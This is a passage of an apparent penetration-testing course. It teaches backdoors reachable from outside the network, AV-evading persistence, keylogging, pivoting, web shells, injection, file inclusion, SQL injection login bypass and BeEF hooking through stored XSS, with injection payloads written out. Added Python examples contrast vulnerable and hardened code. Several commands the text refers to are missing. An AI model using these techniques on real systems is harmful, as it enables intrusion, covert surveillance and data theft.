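  TCP    192.168.1.20:49712     192.168.1.1:80         ESTABLISHED     4120
  TCP    192.168.1.20:49718     203.0.113.45:8080      ESTABLISHED     5580
  TCP    192.168.1.20:49720     198.51.100.9:443       ESTABLISHED     4120
  UDP    0.0.0.0:5353           *:*                                    1288
"""

# Ranges that are never "the internet": RFC 1918, loopback, link-local, unspecified
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "0.0.0.0/8", "::1/128", "fe80::/10", "fc00::/7")]


@dataclass(frozen=True)
class Conn:
    proto: str
    local: str
    remote_ip: str
    remote_port: int
    state: str
    pid: int


def parse_netstat(text: str) -> list[Conn]:
    """Turn the table into Conn records, skipping headers and unconnected sockets."""
    conns: list[Conn] = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0] not in ("TCP", "UDP"):
            continue                                  # header / blank line
        proto, local, remote = parts[0], parts[1], parts[2]
        state = parts[3] if len(parts) == 5 else "-"  # UDP rows have no State column
        pid = int(parts[-1])
        host, _, port = remote.rpartition(":")
        host = host.strip("[]")                       # IPv6 is written as [addr]:port
        if host in ("*", "") or not port.isdigit():
            continue                                  # "*:*" means not connected
        conns.append(Conn(proto, local, host, int(port), state, pid))
    return conns


def is_external(ip: str) -> bool:
    """True when the peer is outside every local/private range above."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in LOCAL_NETS)


def suspicious_connections(text: str, allowed_ports=(80, 443)) -> list[Conn]:
    """Established connections to external hosts on ports other than 80/443;
    the PID is what you then look up in Task Manager."""
    return [c for c in parse_netstat(text)
            if c.state == "ESTABLISHED" and is_external(c.remote_ip)
            and c.remote_port not in allowed_ports]


if __name__ == "__main__":
    for c in suspicious_connections(SAMPLE_NETSTAT):
        print(f"PID {c.pid} -> {c.remote_ip}:{c.remote_port} ({c.proto})")
```

Feed it real output with `netstat -ano` piped into a file; a connection to an unknown address on an odd port from a PID that turns out to be "explorer.exe" or a browser is exactly the pattern the migrate step in Section 16 is meant to produce, so the PID alone is not proof, but it tells you which process to inspect next.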
Section 15: Using attacks outside the local network.

We have learnt many ways to gain access to computers. So far we gained access to computers inside our own network, but the same attacks work outside the network, even when the target is in a different country, as long as port forwarding is configured properly.

In most of our attacks the main thing we need is the reverse connection. When a backdoor is sent outside the network, our local IP is not reachable, so the public IP, the IP of the router, must be used instead. To find your public IP, Google "what is my IP". It is the same for all machines on the same network because they all sit behind the same router.

Backdoor generation to run outside the network:
Backdoor creation is exactly the same as in the previous sections, except that the public IP address is used instead of our local IP.
Run Veil-Evasion and select the rev_http payload.
Set LHOST to the public IP you saw on Google.
Generate and name the backdoor. Copy the generated executable into the web server directory so it can be downloaded.
Now listen for incoming connections on the local IP.
Set the payload, LHOST and LPORT in the handler and run exploit.
Everything is set; the only problem now is the gateway, the router. It does not have the port open, so when it receives the connection it does not know what to do with it.
So the router must be configured so that connections arriving on that port are forwarded to the Kali machine. This can be done in two ways.

1. Configuring the router to forward connections:
Here we configure the router to forward the reverse connections, and hook a website to BeEF to launch attacks from outside the network. To get the IP of the router, open the Kali machine and run: route -n

Open the router's IP in a browser and log in with your credentials.
Look for the IP (port) forwarding settings. Set the public port range and the target port to 8080, enter the Kali machine's IP as the target IP, and save.
Now when the router receives a request on port 8080 it forwards it to the Kali machine.
A rule for port 80 should also be set so the backdoor can be downloaded by the target computer.
Add a rule with public port and target port 80 and the Kali IP as target, and save. This way the web server is reachable, and the backdoor can be downloaded by a target outside the network.
Browsing to the public IP followed by the backdoor filename now downloads the backdoor file, thanks to the port forwarding.

Using BeEF from outside the network:
Start BeEF and log in.
Copy the hook script into the index.html file of the web server, change the IP in it to the public IP you saw on Google, and save.
Go to the port forwarding settings and add a rule for BeEF's port (3000 by default): public port and target port 3000, target IP the Kali machine, and save.
Browse to the public IP from a machine outside the network and its browser is hooked in BeEF.
Instead of individual port forwarding rules you can also set the Kali machine as the DMZ host, if your router supports it.
Enter the Kali IP address as the DMZ host and save. Now every request the router receives from the internet is forwarded to the Kali machine.
Section 16: Post exploitation

In this section we look at:
What to do after gaining access to the target machine.
How to access the target's images, files, videos, actions and keystrokes.
How to use the target as a pivot to exploit the other devices connected to its network.

Basics of meterpreter:
On the Kali machine, start the handler and wait for a meterpreter session.
Run the help command to see the meterpreter commands and modules.
The background command sends the current session to the background: it takes you back to the Metasploit console, where you can run any command while keeping the connection to the target.

The sessions command lists all the sessions (compromised computers); sessions -i [id] returns to one of them.
The sysinfo command shows information about the target machine.
The ipconfig command shows all the network interfaces of the target machine.

The ps command lists all the processes running on the target machine, both foreground and background.
Always move the session into a safe process: one that is always running even when the user is not doing anything, e.g. explorer.exe.
So migrate to the process ID of that process: migrate [pid]

By living inside explorer or the browser, the backdoor runs behind a legitimate process and looks less suspicious when someone checks the network tab of Resource Monitor.
File-system commands:
Get the current working directory on the target with pwd.
To change directory: cd [directory]
To read a file: cat [filename.ext]
To download a file from the target: download [filename.ext]
To upload a file to the target: upload [filename.ext]
To execute a file on the target: execute -f [filename.ext]
The shell command turns the current meterpreter session into an operating system shell on the target.

There are many more file system commands; experiment with them.
Basics of maintaining access:
With all of the previous methods we lose access to the target once the user restarts the device, because the backdoor process is terminated. There are several ways to keep continuous access: Veil-Evasion alone, Metasploit's persistence module, or Metasploit together with Veil-Evasion.

The Metasploit + Veil-Evasion method works better than the other two and is not detected by anti-virus. The backdoor file is injected as a Windows service on the target so that it runs every time the machine boots. To do that:
Background the session as in the previous module and load the persistence-service post-exploitation module.

Set the EXE_NAME option to something that looks like a browser process.

Set the SESSION option to the session the service should be installed through.

Most importantly, set the payload option to the same payload used in the backdoor, so the injected service connects back the same way.

Run exploit. The module prints the command that removes the persistence afterwards; save it in a notepad so you can clean up when you are done.

To kill the sessions: sessions -K

Then listen for incoming connections again; the service reconnects and you have access to the target computer after every reboot.
Spying:
Every keystroke and mouse movement on the target machine can be seen by us.
A keylogger that comes with meterpreter is used for this.
In the meterpreter session, start the keylogger: keyscan_start

To see everything recorded on the target: keyscan_dump

To stop the keylogger: keyscan_stop

To get a screenshot of the target's screen, use the screenshot command; it saves the image on the Kali machine, in root's directory.

Pivoting:
Suppose our target is connected to a network along with other devices. The target itself is invisible to the hacker because it sits behind another machine, but the hacker can see, and has access to, another device on that network. Since the hacker controls a device on the same network as the target, that hacked device is used as a pivot to reach the target. In simpler words, we use a hacked system to hack into another system.
To set this up in the lab, the network settings of the virtual machines must be changed.
Open VMware and open the Windows VM's network settings.
Add a second network adapter to it and set that adapter to Bridged instead of NAT.
Go to the Metasploitable VM and set its connection to the bridged network too.
To set a route between the hacker's computer and the network behind the hacked computer, the autoroute module (post/multi/manage/autoroute) is used.
First, with a meterpreter session on the Windows machine, try the exploit directly:

Set RHOST to the IP of the Metasploitable machine and set the payload.

Run exploit. It fails, because the hacker cannot see the target: it is hidden, even though it is vulnerable.
In the meterpreter session, look at the interfaces (ipconfig) for one with an IP address in a different subnet; that is the network a route must be added for.
Background the session and use the autoroute module.
Set SUBNET to the subnet of that interface and SESSION to the session id, and run it. This creates the route through the session.

Now the Kali machine can reach the target machine through the pivot.
Run the same exploit against the target again.

Access to the target machine is gained.


Chapter 3: Website Hacking.

What is a website? A website is an application installed on a computer, and it works the same for all client devices and operating systems. The machine runs applications that together act as a web server; the two main ones are the web server software and a database. The web server executes the web application, and the database holds the data the web application uses.

All of this is stored on a computer called a server, which is connected to the internet and has a real (public) IP address. Whenever a request is sent, the web application is executed on the web server, which returns an HTML page as the response. Because the server is just a computer, the attacks learnt in the previous sections can be used against it. In this chapter we focus on testing the security of the web application itself.

Section 17: Information gathering

Using whois lookup:
Information gathering is the basis of any hacking, and it can be done with the tools we have already seen: Nexpose, Maltego, Zenmap and so on. These also apply to websites, because a website is just another computer. The extra things we need for a website are its domain name and DNS records, and several services exist to find them.
Whois is a protocol used to look up the owners of internet resources such as domain names and IP ranges.
Google "whois lookup" and open whois.domaintools.com
Enter the domain name you want to look up and hit enter.
You get a lot of information about that domain: registrar, registration dates, name servers and, unless privacy protection is enabled, the registrant's contact details.
With this information you can socially engineer the target and gain access to the machine.

Discovering technologies used on the website:
Information about the technologies used by the target website can be gathered with a service called Netcraft.

Enter the target website in the URL box and hit enter.
It gives basic details about the site such as when it was first seen, its site rank and keywords.
Then the network details: IP address, domain owner, DNS admin, reverse DNS and so on.
This is followed by the hosting history of the site, security information and more; the technology section lists the web server, server-side languages and frameworks.

DNS information:
To gather the DNS records of the target from its DNS servers, a website called robtex.com is used.
Enter the target on the website and hit enter.
A report about the website is generated.
You can read the full report or jump to the required sections with the section tabs.
The report has the following information:
1. Name servers (the DNS hosting)
2. Mail servers (e.g. Google mail servers)
3. IP addresses
4. Domains similar to the target
5. Quick info on the website
6. History
7. A graph, and more.

Discovering subdomains:
The target is usually given as a domain name in the form target.com. Domain names can have subdomains, e.g. subdomain.target.com or mail.google.com.

It is very important to discover the subdomains of your target domain because they often expose a lot: sensitive data, management interfaces or beta versions of the application. There are many tools for discovering subdomains; here a tool called knock is used.

Download and install it.

On the Kali machine, run it against the target domain:
knockpy [target domain]
Once you hit enter it starts displaying the subdomains it finds for the target domain.

Each of these widens the attack surface we can use to gain access to the target.

Discovering sensitive files:
To find files and directories on the target web server, a tool called dirb is used. To see how to use it, run man dirb, which lists all the options of the tool.
To run dirb on the target: dirb [target URL]

Analysing the discovered files:
When dirb starts, it uses its default wordlist and reports which paths exist on the website.
Look through the results for useful files and open them to gather more information.
Always try to open PHP files, since they may contain configuration details and other useful information about the website.
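What dirb does, reduced to its core and run against a throwaway local web server so it works offline, as an added example that is not part of the original notes. The wordlist and the files served are constructed for the example; the real tool uses its own wordlists against the target's URL, and the function names are mine.

```python
# Added example, not part of the original notes: a dirb-style path brute
# forcer, exercised against a constructed site served from a temp directory.
from __future__ import annotations

import functools
import http.server
import os
import socketserver
import tempfile
import threading
import urllib.error
import urllib.request

# Constructed mini wordlist; dirb ships lists of thousands of entries
WORDLIST = ["admin", "admin.php", "config.php", "robots.txt", "backup",
            "phpinfo.php", "uploads", "login.php", ".git/HEAD"]

# Opener with no proxies so localhost requests never leave the machine
_OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))


def probe_paths(base_url: str, words: list[str]) -> dict[str, int]:
    """Request base_url/word for each word; return {word: status} for every
    path that did not answer 404. 403 is kept on purpose: a forbidden
    directory still proves the path exists."""
    found: dict[str, int] = {}
    for word in words:
        req = urllib.request.Request(f"{base_url.rstrip('/')}/{word}", method="HEAD")
        try:
            with _OPENER.open(req, timeout=5) as resp:
                found[word] = resp.status
        except urllib.error.HTTPError as err:
            if err.code != 404:
                found[word] = err.code
        except urllib.error.URLError:
            pass                                   # host unreachable: skip
    return found


class _QuietHandler(http.server.SimpleHTTPRequestHandler):
    def log_message(self, *args) -> None:          # keep the console clean
        pass


def serve_fake_site() -> tuple[socketserver.TCPServer, str]:
    """Serve a constructed site from a temp dir; returns (server, base_url)."""
    root = tempfile.mkdtemp()
    for rel in ("admin.php", "robots.txt", "uploads/x.txt"):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("<?php // constructed sample file ?>\n")
    handler = functools.partial(_QuietHandler, directory=root)
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), handler)
    srv.daemon_threads = True
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}"


def scan_fake_site() -> dict[str, int]:
    """Start the constructed site, scan it with WORDLIST, tear it down."""
    srv, base = serve_fake_site()
    try:
        return probe_paths(base, WORDLIST)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    for path, status in sorted(scan_fake_site().items()):
        print(f"+ /{path}  ({status})")
```

Note that "uploads" is reported even though the wordlist entry has no trailing slash: the server redirects to "uploads/" and the directory listing answers 200, which is the same behaviour dirb relies on when it reports a directory.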

Section 18: Discovering vulnerabilities.

File upload vulnerability:
This is the easiest vulnerability to exploit: if the site lets us upload files without checking them, we upload a shell and gain access.
A tool called weevely generates PHP shells and lets us interact with them once uploaded.
To generate the shell:
weevely generate [password for the shell] [path where to save it, including filename]

Now the file is created. Upload it through the file upload page of DVWA on Metasploitable.
To interact with the uploaded file, in the terminal:
weevely [URL of the uploaded file] [password]
From here you can run Linux commands on the target and the results are shown here.
To learn more about weevely and its commands, type help and experiment with the options.

Code execution vulnerability:
These vulnerabilities let us run code on the target, in whatever language the OS understands. We can upload any file, tool or malware to the target through them.
We can also run OS commands and send a reverse shell connection back from the target.
Go to DVWA and select Command Execution.
The page pings an IP address you give it. If you append another command after a semicolon, e.g. 127.0.0.1; pwd, the page shows the ping output followed by the current working directory: the input is passed straight to a shell.
This means you can run any command on the target. To gain access, inject a command that starts a reverse shell back to the Kali machine, and listen for the connection with netcat or the Metasploit handler.
Now you have full access to the target machine.
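The ping page's bug and its fix, as an added example that is not part of the original notes, written in Python rather than DVWA's PHP. ping_vulnerable() builds a shell command by string concatenation the way the DVWA page does; ping_fixed() validates the input as an IP address and never hands it to a shell. "echo" stands in for ping so the example runs anywhere without network access or root. Function names are mine.

```python
# Added example, not part of the original notes: the command-injection bug
# behind the DVWA ping page, beside a hardened version. "echo" stands in for
# "ping -c 3"; the injection behaves identically.
import ipaddress
import shlex
import subprocess

BASE_CMD = "echo PING"


def ping_vulnerable(user_input: str) -> str:
    # VULNERABLE on purpose: the user string becomes part of a shell line,
    # so "127.0.0.1; id" runs both commands, exactly as on the DVWA page.
    return subprocess.run(f"{BASE_CMD} {user_input}", shell=True,
                          capture_output=True, text=True).stdout


def ping_fixed(user_input: str) -> str:
    # 1. Validate: anything that is not a literal IP address is rejected.
    try:
        target = str(ipaddress.ip_address(user_input.strip()))
    except ValueError as exc:
        raise ValueError(f"not an IP address: {user_input!r}") from exc
    # 2. No shell: an argv list, so ';', '|', '$(...)' are ordinary characters.
    argv = shlex.split(BASE_CMD) + [target]
    return subprocess.run(argv, shell=False, capture_output=True, text=True).stdout


def is_injection_successful(user_input: str, marker: str) -> bool:
    """True if the vulnerable handler executed the injected command."""
    return marker in ping_vulnerable(user_input)


def rejects(user_input: str) -> bool:
    """True if the hardened handler refuses the input."""
    try:
        ping_fixed(user_input)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(ping_vulnerable("127.0.0.1; echo INJECTED"), end="")
    print(ping_fixed("127.0.0.1"), end="")
    print("fixed rejects injection:", rejects("127.0.0.1; echo INJECTED"))
```

Both changes matter: validation alone still leaves the shell in the path, and dropping the shell alone still lets a caller pass hostile arguments such as ping options, so the hardened version does the two together.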

Local file inclusion vulnerability:
These vulnerabilities let you read any file on the same server as the website, even files outside the web root.
Go to DVWA and select File Inclusion.
The page loads another file whose name is given in the URL (the page parameter).
By default it includes a file that exists in the same directory.
We will read /etc/passwd, which lists all the users of the OS.
On a Linux machine, cat /etc/passwd shows all the users with their home directories and shells.
Now go back to the browser and set the URL parameter to /etc/passwd (or a traversal path such as ../../../../etc/passwd); the file's contents are returned in the page.
Copy and paste the output into a text editor to read it.
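The include logic behind the DVWA page, as an added example that is not part of the original notes, with the vulnerable version beside a hardened one. A temporary directory stands in for the server: a web root with one page, and a file outside it playing the role of /etc/passwd. Function names and the constructed contents are mine.

```python
# Added example, not part of the original notes: local file inclusion in
# Python, vulnerable and fixed, exercised in a throwaway directory tree.
from __future__ import annotations

import os
import tempfile


def include_vulnerable(web_root: str, page: str) -> str:
    # VULNERABLE on purpose: like PHP's include($_GET['page']), the parameter
    # is used as a path. os.path.join drops web_root when page is absolute,
    # and "../" walks out of it.
    with open(os.path.join(web_root, page)) as fh:
        return fh.read()


def include_fixed(web_root: str, page: str) -> str:
    # 1. Canonicalise and require the result to stay inside the web root.
    root = os.path.realpath(web_root)
    target = os.path.realpath(os.path.join(root, page))
    if os.path.commonpath([root, target]) != root:
        raise PermissionError(f"path escapes web root: {page!r}")
    # 2. Only include what an include is meant to include.
    if not target.endswith(".php"):
        raise PermissionError(f"not an includable page: {page!r}")
    with open(target) as fh:
        return fh.read()


def blocked(web_root: str, page: str) -> bool:
    """True if the hardened include refuses the page parameter."""
    try:
        include_fixed(web_root, page)
    except PermissionError:
        return True
    return False


def build_sandbox() -> tuple[str, str]:
    """Return (web_root, secret_file); both hold constructed contents."""
    base = tempfile.mkdtemp()
    web_root = os.path.join(base, "var", "www", "html")
    os.makedirs(web_root)
    with open(os.path.join(web_root, "include.php"), "w") as fh:
        fh.write("<?php echo 'hello'; ?>")
    etc = os.path.join(base, "etc")
    os.makedirs(etc)
    secret = os.path.join(etc, "passwd")
    with open(secret, "w") as fh:
        fh.write("root:x:0:0:root:/root:/bin/bash\n")   # constructed line
    return web_root, secret


def lfi_demo() -> dict[str, bool]:
    web_root, secret = build_sandbox()
    traversal = "../../../etc/passwd"   # html -> www -> var -> base, then etc/passwd
    return {
        "vuln_reads_secret_by_traversal": "root:x:0:0" in include_vulnerable(web_root, traversal),
        "vuln_reads_secret_by_abs_path": "root:x:0:0" in include_vulnerable(web_root, secret),
        "fixed_serves_normal_page": "hello" in include_fixed(web_root, "include.php"),
        "fixed_blocks_traversal": blocked(web_root, traversal),
        "fixed_blocks_abs_path": blocked(web_root, secret),
    }


if __name__ == "__main__":
    for check, ok in lfi_demo().items():
        print(f"{check}: {ok}")
```

The realpath step is what defeats both the absolute path and the traversal; checking for "../" as a substring is not enough, because encodings and symlinks give other ways to the same file, so compare canonical paths rather than strings.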

Remote file inclusion vulnerability:

It is a special case of the file inclusion vulnerability. In the previous module, we saw how to include any file on the server.
If the web server has the PHP settings allow_url_include and allow_url_fopen enabled, we can include code from any computer into the target. We can run payloads and system shells and get access to the target.
The only difference between remote and local file inclusion is that the setting which lets the include fetch a remote file instead of a local one has to be enabled.
To check it, go to the Metasploitable machine and open the PHP settings file (php.ini).
In Metasploitable you have to prefix the command with sudo to run it as root.
Search for allow_url in the editor with ctrl+w.
If these settings are On, remote file inclusion is possible.
To exit the editor, press ctrl+x, then y to save.
Now you have to restart the web server.
Go back to DVWA and run your saved file through the URL. Remember to host the file on a machine in the same network, using its real IP, so that it can be reached remotely.
The file will then be executed by the target web server. Start listening for connections in Kali and request the file through the vulnerable page.
Only then will you gain access to the target.

Preventing vulnerabilities:
Only allow safe files to be downloaded and check the file types.
Before executing a file, filter its inputs.
Disable allow_url_include and allow_url_fopen on your machine.
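Added example, not from the course or DVWA: the include pattern the page exploits, beside a hardened version that allowlists the page name and confirms the resolved path stays inside the web root. The web root path and the allowed page names are assumptions.

```python
from pathlib import Path

# Assumed web root of the vulnerable application (hypothetical path).
WEB_ROOT = Path("/var/www/html")
# Constructed allowlist: the only pages the application should ever include.
ALLOWED_PAGES = {"index.php", "about.php", "file1.php"}


def include_vulnerable(page: str) -> Path:
    """The injectable pattern: the 'page' parameter is joined to the web
    root as-is. An absolute path such as /etc/passwd replaces the root
    entirely, and '../' sequences walk out of it; that is the local file
    inclusion the page demonstrates (with allow_url_include on, a URL
    would be fetched too)."""
    return Path(WEB_ROOT, page)


def include_safe(page: str) -> Path:
    """Hardened include: accept only an allowlisted file name, then confirm
    the resolved path still lies under the web root. Raises ValueError
    for anything else (absolute paths, traversal, remote URLs)."""
    if page not in ALLOWED_PAGES:
        raise ValueError(f"page not allowed: {page!r}")
    root = WEB_ROOT.resolve()
    resolved = (root / page).resolve()
    if root not in resolved.parents:
        raise ValueError(f"path escapes web root: {page!r}")
    return resolved


def is_allowed(page: str) -> bool:
    """True if include_safe would serve the page, False if it rejects it."""
    try:
        include_safe(page)
        return True
    except ValueError:
        return False
```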

Section 19: SQL vulnerabilities

Most websites use a database to store data. Everything that happens on the website is stored in the database, and the web application queries the database and displays the data to the user. This interaction between the web application and the database happens using a language called SQL.

SQL vulnerabilities & their danger:

It is more dangerous than the other vulnerability types because it can be found anywhere. It gives you access to the database, which holds sensitive data. Local files can be read even if they are outside the web root. It can easily be used to become the admin and exploit the system, and dangerous files can be easily uploaded. So it can serve as both a file inclusion and a file upload vulnerability, with access to the database on top.
Discovering in POST:
To discover SQL injections, browse through the target and try to break each page. If you find a textbox in a form, or a page like
http://target.com/page.php?something=something
try to inject code using "and", the single quote ' and "order by" to break the page and make it look different.

For example, consider a login page with the username: user and password: 123456

To find out whether an SQL vulnerability is present, instead of entering just the right password, enter the password as
123456' and 1=1#
Anything after the # is treated as a comment and ignored.

This way the password still looks like the real password to the database. So if you can log in with that password, an SQL vulnerability is present in the website. Now if you enter the password with a false statement, for example
123456' and 1=2#
you will not be able to log in, because the condition is FALSE. So you can inject anything from the password field into the website's query.
Bypassing Logins:
Now that we know we can inject anything in the password field and have it executed on the target system, we can bypass the login without knowing the credentials.

With this password, if you try to log in you will be able to log in to the page because it contains an 'or' condition, so if any one of the statements is true the whole condition is TRUE. Bypassing depends on the code of the website, and it is up to the individual to think of different ways to get around it.
Discovering in GET:
Now instead of going to the login page, go to the user info page and try to log in; it will display the user's details. The GET method can also be used to exploit the vulnerability. GET is a request you send to fetch something, like the user info.

When you work with GET, the data you enter is reflected in the URL, so you can look for the vulnerability through the URL instead of the webpage. This also applies to pages that do not have a textbox.

Now in the URL, next to the username, add
order by 1
and instead of # use its URL-encoded form %23.

Hit enter and you can see the information displayed without even entering the login details.

Reading database information:

To find how many columns are selected on a page, the order by command is used. In place of order by 1, try different numbers and see if the page still works.
If the page gives an error for a number, the table does not have that many columns, so decrease the number until you find the exact count.
After finding the number of columns, we can run our own statement and get it executed on the target.

With the union command, we can see information from the database in the selected columns.
Whatever you inject in the place of a column will be reflected in the output, and the data will be displayed.

Database tables:
Our target database is owasp10; let's try to discover the tables in it. Run the command,

For the given command, the records will be displayed with all the tables in the database.
Sensitive data extraction:
To read the information stored in a table, we need the column names first.
To get the columns,

The column names of the table will be displayed.

When you need the usernames and passwords of the accounts, modify the same command and run it.
This way you can also inject any file, like a backdoor or virus, through the URL and exploit the system.

Reading & writing files on the server:

To read a file on the server, even if it is outside the web root,

To write to the server,

Now in the terminal, if you run ls /tmp/ you can see the file created, and to see its contents run cat /tmp/filename.

Data extraction using SQLmap:

Instead of injecting code manually, a tool called SQLmap can be used to do everything automatically.
Open the Kali machine and run SQLmap.

It will automatically look through all the parameters and, if anything is injectable, ask for your permission to continue.
Run the help command to see the options of the tool.
To get all the databases, add --dbs to the same command.
To get all the tables, add --tables to the command.
To get all the data of the table,

All the data will be displayed in a table.

Prevention of SQL vulnerabilities:

SQL injections are very dangerous and straightforward to exploit. The best way to prevent them is to program your web application in a way that does not allow code to be injected into it and executed.
Use parametrised statements, in which the data and the code are separated.
As a second line of defence you can use filters and whitelist and blacklist commands, but that is not 100% secure.
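The differential probe from the discovery section, the 'or' bypass and the parametrised fix from this section, in one added example that is not part of the course material. It uses an in-memory SQLite table standing in for the target's users table; SQLite does not accept MySQL's # comment, so the probes end with -- instead.

```python
import sqlite3

TRUE_PROBE = "123456' and 1=1-- "   # the page's true probe, MySQL form: 123456' and 1=1#
FALSE_PROBE = "123456' and 1=2-- "  # the page's false probe
BYPASS = "' or 1=1-- "              # login bypass: one true OR clause is enough


def make_db():
    """Constructed in-memory stand-in for the target's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('user', '123456')")
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string concatenation, so the password field is
    parsed as SQL. Returns the matched username, or None."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return None  # a broken query is the "page looks different" signal
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parametrised statement: data travels separately from the code, so the
    probes above are compared literally against the stored password."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def looks_injectable(login, conn, username="user"):
    """The page's differential test: a true condition logs in and a false
    one does not only if the field is being interpreted as SQL."""
    return (login(conn, username, TRUE_PROBE) is not None
            and login(conn, username, FALSE_PROBE) is None)
```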
Section 20: Cross-site scripting vulnerabilities

XSS, also called cross-site scripting, is a powerful vulnerability that allows hackers to insert JavaScript code into a page and have it executed. JS is a client-side language, so the code is executed in the user's browser when the page loads. The web server only acts as the carrier of the code. It is of three main types:
1. Persistent/stored XSS
2. Reflected XSS
3. DOM-based XSS

Reflected XSS:
It is very similar to SQL injection discovery: browse through the web application and try to inject into the textboxes.
It is not persistent and not stored, so it only works when the target visits a specially crafted URL.
Go to the DVWA website and select XSS reflected. Let's try to inject the JS code into the textbox.

This code gets executed. We can do the same in the URL, so if the URL is shared with anybody and they open it, the code will be executed on their machine.
Stored XSS discovering:
It is similar to reflected XSS; the difference is that with reflected XSS the target has to actually open the crafted URL for the code to run.
With stored XSS the code is stored in the database behind the page, so every time someone loads the page the code is executed. So no user interaction is needed.
Go to DVWA and select XSS stored.

The alert message will run for the given code. So from now on, whoever loads the website will get the same alert message.

Exploiting XSS:
To exploit XSS and gain access to the target computer, we are going to use BeEF.
Using the BeEF hook URL, we are going to inject it into the stored XSS page, so everyone visiting the page will be hooked to BeEF.
To hook victims, the default hook of BeEF should be used.
Now any device opening the website will be hooked to BeEF.
You can now run all the commands on the target that we learnt in the previous sections.

Preventing XSS vulnerabilities:

These vulnerabilities happen because the data entered by the target is displayed in the HTML, so it can be exploited using JS.
To prevent this, minimize the use of untrusted input in the page.
If a URL comes to you asking for an update, be careful and make sure to go to the website yourself and check for updates.
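Added example (not from the course or DVWA) showing why both flavours happen and what the fix looks like: a stored comment list and a reflected query parameter rendered raw, then rendered through html.escape so the script markup no longer runs. The host name in greeting_url is a hypothetical placeholder.

```python
import html
from urllib.parse import parse_qs, quote, urlsplit

# Constructed sample input: the alert payload tried on the DVWA pages.
PAYLOAD = "<script>alert('xss')</script>"

# Stored XSS: submitted comments persist (here in a list standing in for the
# database) and are rendered for every later visitor, so no link is needed.
comments = []


def store_comment(text):
    comments.append(text)


def render_guestbook(escape):
    """Raw rendering reproduces the flaw; escape=True is the fix."""
    rows = [html.escape(c) if escape else c for c in comments]
    return "<ul>" + "".join(f"<li>{r}</li>" for r in rows) + "</ul>"


# Reflected XSS: the 'name' query parameter is echoed straight back into the
# response, so the code only runs for whoever opens that particular URL.
def greeting_url(name):
    return "http://target.example/xss_r/?name=" + quote(name)  # hypothetical host


def render_greeting(url, escape):
    name = parse_qs(urlsplit(url).query).get("name", [""])[0]
    return f"<p>Hello {html.escape(name) if escape else name}</p>"


def contains_script(page):
    """Check used in the assertions: does live <script> markup survive?"""
    return "<script" in page.lower()
```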
Section 21: Automatic vulnerability discovery

Several tools exist to automatically discover vulnerabilities, but it is always best to do manual testing as well, as there can be errors and false positives in the tool. The tool we are going to use is ZAP.
Download and open ZAP.

To start the attack, paste the target URL in the URL textbox.

Give it some time to run the scan.

Analyzing the results:
On the right you can find the alerts discovered and the data collected from the target URL.
The alerts with red flags are the high-priority alerts.

The alerts are ordered based on their severity.

To know more about an alert, just click on it. It displays the description of the vulnerability, how and when it was detected, and much more information.
The tool is very simple and powerful; experiment with its options.
Pentest report:
It is important to make a report of all the found vulnerabilities and bugs if you are working for a client.
The templates and format of the report differ for each company.
The main sections of the report are,
1. The cover section with the date and the details of who is writing the report and to whom.
2. The table of contents with page numbers.
3. The legal information (mostly written by the legal team of the company).
4. Executive and engagement summary.
5. Technical findings.
6. Information disclosure.

Ways to secure websites and apps:

1. Use/write secure code.
2. Review the code before use.
3. Get a pentest done.
4. Run a bug bounty program.
Remember, nothing can give you 100% security; these measures secure your system to a certain level. Better one than zero!
